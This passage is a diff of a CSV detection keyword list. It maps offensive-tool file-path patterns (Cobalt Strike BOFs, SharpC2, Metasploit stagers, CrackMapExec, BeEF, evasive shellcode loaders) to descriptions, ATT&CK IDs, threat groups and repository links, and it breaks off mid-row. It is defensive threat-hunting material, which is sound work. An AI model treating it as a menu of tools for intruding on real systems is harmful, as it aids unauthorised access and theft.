-"*/client/bof/*.asm*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*/client/beef.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*/client/bof/*.asm*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
 "*/Client/Commands/Enumeration.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
 "*/Client/Commands/Execution.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
 "*/Client/Commands/Injection.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
@@ -3067,30 +3073,30 @@ "*/Client/Pages/Drones.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Pages/Payloads.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Pages/Pivots.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*/clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/clipboardinject/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/clipboardinject/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/clipmon/clipmon.sln*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/clipmon/dll/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 
- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","","N/A","","","" -"*/CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-02T19:54:24Z","2023-04-28T01:58:18Z" +"*/CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" "*/clock-skew.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/cloud_enum.git*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" -"*/cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" -"*/cloud_enum.txt*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" -"*/cloudbrute.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*/cloudsploit.git*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*/cloud_enum.git*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*/cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*/cloud_enum.txt*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*/cloudbrute.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/cloudsploit.git*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" "*/clown-newuser.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/cmd/c2.go*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*/cmd/hades/*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*/cmd_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*/cmd_log.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web 
Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/cmd_stager*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/cmdstager/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/cme_adcs_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/cme_shares_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/cme_spooler_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/cmd_log.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/cmd_stager*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/cmdstager/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/cme_adcs_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/cme_shares_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/cme_spooler_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/CMSeek*","offensive_tool_keyword","CMSeek","CMS Detection and Exploitation suite - Scan WordPress. Joomla. Drupal and 130 other CMSs.","T1553 - T1580 - T1583 - T1584 ","TA0007","N/A","N/A","Web Attacks","https://github.com/Tuhinshubhra/CMSeek","1","0","N/A","N/A","10","2062","497","2023-07-03T12:17:20Z","2018-06-14T00:15:51Z" "*/Cn33liz*","offensive_tool_keyword","Github Username","Github username Red teamer @ Outflank. Passionate about networking and cybersecurity. 
